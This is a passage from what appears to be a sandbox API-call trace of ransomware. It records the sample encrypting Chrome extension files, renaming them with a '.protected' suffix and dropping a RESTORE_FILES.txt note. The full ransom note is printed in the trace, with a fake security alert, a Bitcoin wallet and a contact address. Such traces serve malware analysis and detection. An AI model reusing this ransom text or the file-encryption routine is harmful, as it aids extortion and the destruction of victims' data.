(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.709] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.709] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.709] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.709] CloseHandle (hObject=0x164) returned 1 [0078.710] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0078.710] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0078.710] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0078.710] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 141 [0078.710] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0078.710] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0078.710] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*") returned 143 [0078.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.711] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\.") returned 143 [0078.711] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.711] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.711] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\..") returned 144 [0078.711] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.711] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.711] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.711] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.711] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.711] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.712] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.712] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.712] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.712] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.712] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0078.713] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.713] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0078.713] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.713] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.714] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.714] CloseHandle (hObject=0x168) returned 1 [0078.714] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected") returned 165 [0078.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.protected")) returned 1 [0078.714] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.714] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.715] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0078.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.715] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.716] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.716] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.716] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.716] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.716] CloseHandle (hObject=0x164) returned 1 [0078.716] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0078.716] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 141 [0078.716] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0078.716] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*") returned 143 [0078.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.717] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\.") returned 143 [0078.717] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\..") returned 144 [0078.717] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.717] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.717] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.718] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.718] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.718] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.718] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x123, lpOverlapped=0x0) returned 1 [0078.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.719] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x123, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x123, lpOverlapped=0x0) returned 1 [0078.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.719] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.720] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.720] CloseHandle (hObject=0x168) returned 1 [0078.720] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected") returned 165 [0078.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected")) returned 1 [0078.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.720] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.720] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0078.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.721] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.721] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.722] lstrlenA 